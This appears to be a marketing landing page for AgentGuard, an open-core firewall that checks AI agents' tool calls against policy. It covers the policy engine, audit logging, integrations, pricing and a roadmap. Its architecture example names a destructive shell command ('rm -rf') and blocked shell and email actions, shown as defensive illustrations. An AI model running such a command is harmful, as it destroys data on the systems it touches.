Wrap the tool layer.
One adapter call wraps the framework you already use. Every tool invocation now passes through the gate — including dynamic and model-generated ones.
# langchain tools = guard(tools, "./policy.yaml")
Early accessv0.5 preview · waitlist now open
A runtime firewall for AI agents.
AgentGuard sits between your agent and its tools — deciding, in code, what reaches your database, your APIs, your customers. Open core. Self-hosted. Built so a hijacked prompt never becomes a hijacked production system.
Open-source core, free foreverHosted dashboard for an easy install
Apache 2.0core license
< 1 mspolicy decision (p99)
0data leaves your VPC
4framework adapters
how it works
Three steps. No model changes. No new vendor in your data path.
Drop the SDK in front of your agent’s tool layer. Define policy. Stream the audit. Self-hosted by default — we never see your traffic.
Decide in policy.
Rules in YAML or Rego. Match on tool, args, host, time, identity. Allow, block, redact, or require human approval — all composable.
match: db.query / op: "DELETE" decision: block
Stream every decision.
Hash-chained, signed audit log. Push to S3, Loki, or your SIEM. Replay any agent run end-to-end — what was asked, what was allowed, what reached the world.
# 14:02:11.482 shell.exec → block · sig d8f1a2
architecture
One gate between intent and effect.
The agent issues a tool call; the gate evaluates policy; the call proceeds, is redacted, or is denied. Every decision is hash-chained to the next — whether the gate runs in-process or on the wire.
intent agent
http.fetch wiki.internal
db.query SELECT
browser.click submit
shell.exec rm -rf
email.send vendor
enforce
AgentGuard
Policy evaluated in < 1 ms. One decision per call. Signed, replayable audit.
YAMLRegoHash-chainedSelf-hosted
real systems
wiki.internal · read
users · pii redacted
browser · confirmed
shell · blocked
email · blocked
integrations
Sits between the agent and the tool — wherever the agent runs.
Embed it in the agent for tight integration, or run it on the wire for zero code changes. Same enforcement engine, your choice of install.
SDK adaptersin-process
L
LangChain
py · ts
live in preview
C
CrewAI
py
live in preview
B
browser-use
py
live in preview
M
MCP
stdio · sse
live in preview
Wire-levelout-of-process · new in v0.5
G
MCP gateway
agentguard-mcp-gateway
JSON-RPC bridge between MCP client and upstream server. Gates every tool call before it reaches the model — no agent code changes.
live in preview
P
LLM proxy
agentguard-llm-proxy
HTTP proxy in front of OpenAI and Anthropic. Buffers and inspects tool-call blocks against policy, with streaming support.
live in preview
security & deployment
Runs where your data already lives.
We took out the things you don’t want in your security path: an outbound dependency, a vendor with your prompts, a black-box decision. AgentGuard is yours, in your process.
Self-hosted by default
Single binary or library. Runs in your VPC, your container, your laptop. There is no SaaS to call.
Your data stays yours
By default, prompts, tool args, and results never leave your network — the runtime makes no outbound calls. If you opt in to the hosted dashboard, you choose what gets sent.
Signed audit, replayable
Every decision hash-chained to the previous. Stream to S3, Loki, or your SIEM. Reconstruct any run end-to-end.
Policy as code
YAML for the common case, Rego when you need expression. Reviewable in PRs. Versioned, diff-able, deployable like any service.
Sub-millisecond decisions
Compiled rule tree, no network hops. The gate is fast enough to sit in front of every tool call without changing user-perceived latency.
Open core, forever
The runtime is Apache 2.0 and stays that way. The hosted dashboard is a paid layer on top — it never gates the open path.
pricing
Free forever, if you don’t mind YAML. Paid if you want it easy.
The full runtime is open source — install, configure, self-host. The paid plan is a hosted dashboard that handles install, policy editing, and rollout for you.
Open Source
AgentGuard Core
$0 / foreverThe full runtime, the adapters, the policy engine. Apache 2.0, source on GitHub. You write the YAML, you run the binary, you keep every byte.
- +Full policy engine (YAML & Rego)
- +All framework adapters
- +Hash-chained signed audit log
- +Self-host, single binary or library
- +Community support — issues & Discord
Paid · early access
Hosted Dashboard
waitlistSame runtime, made easy. One-click install, a UI for writing and rolling out policy, and an opt-in storage layer if you want a managed audit trail instead of running your own.
- +One-click install & updates
- +Visual policy editor with diff & review
- +Multi-environment rollout & rollback
- +Optional managed audit storage (opt-in)
- +SSO, RBAC, on-call routing
- +Pricing announced when GA
roadmap
Where we are. Where we’re going.
Built in public. Shipped against a thesis, not a press release.
Q1 · 2026
Initial development
- Idealized, prototyped, iterated
- First runtime prototype
- Policy DSL drafted
Q2 · 2026
Open source
- AgentGuard v0.1 published
- LangChain & MCP adapters
- Apache 2.0, public repo
Now · v0.5
Public preview
- Wire-level enforcement: MCP gateway + LLM proxy
- SDK adapters hardened (LangChain, CrewAI, browser-use, MCP)
- Design-partner waitlist open
Next · H2 2026
v1 + hosted
- Stable policy schema, semver
- Hosted dashboard (private beta)
- Browser-agent & voice-agent adapters
Ship agents like you ship code.
Reviewed. Versioned. Auditable. Get on the waitlist for early access — design partners go first, OSS ships free, forever.